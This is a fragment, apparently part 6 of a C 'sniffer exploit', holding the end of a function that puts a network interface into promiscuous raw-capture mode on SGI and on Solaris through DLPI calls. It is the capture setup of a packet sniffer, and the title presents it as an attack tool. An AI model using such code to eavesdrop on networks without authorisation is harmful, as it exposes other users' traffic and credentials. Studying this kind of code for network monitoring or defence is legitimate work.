Sniffer exploit - 6


if(ioctl(sock,SIOCSNOOPING,&on)<0) return(-4);

#endif

 

#ifdef SOLARIS

long buf[CHUNKSIZE]; dl_attach_req_t ar; dl_promiscon_req_t pr;

struct strioctl si; union DL_primitives *dp; dl_bind_req_t bind_req;

struct strbuf c; int flags;

if ((sock=open(nit_dev,2))<0) return(-1);

ar.dl_primitive=DL_ATTACH_REQ; ar.dl_ppa=0; c.maxlen=0;

c.len=sizeof(dl_attach_req_t); c.buf=(char *)&ar;

if (putmsg(sock,&c,NULL,0)<0) return(-2);

c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlokack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_OK_ACK) return(-3);

pr.dl_primitive=DL_PROMISCON_REQ; pr.dl_level=DL_PROMISC_PHYS; c.maxlen = 0;

c.len=sizeof(dl_promiscon_req_t); c.buf=(char *)&pr;

if (putmsg(sock,&c,NULL,0)<0) return(-4);

c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlokack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_OK_ACK) return(-5);

bind_req.dl_primitive=DL_BIND_REQ; bind_req.dl_sap=0x800;

bind_req.dl_max_conind=0; bind_req.dl_service_mode=DL_CLDLS;

bind_req.dl_conn_mgmt=0; bind_req.dl_xidtest_flg=0; c.maxlen=0;

c.len=sizeof(dl_bind_req_t); c.buf=(char *)&bind_req;

if (putmsg(sock,&c,NULL,0)<0) return(-6);

c.maxlen=CHUNKSIZE; c.len=0; c.buf=(void *)buf;

strgetmsg(sock,&c,&flags,"dlbindack"); dp=(union DL_primitives *)c.buf;

if (dp->dl_primitive != DL_BIND_ACK) return(-7);

si.ic_cmd=DLIOCRAW; si.ic_timout=-1; si.ic_len=0; si.ic_dp=NULL;

if (ioctl(sock, I_STR, &si)<0) return(-8);

if (ioctl(sock,I_FLUSH,FLUSHR)<0) return(-9);

#endif

return(sock);

}



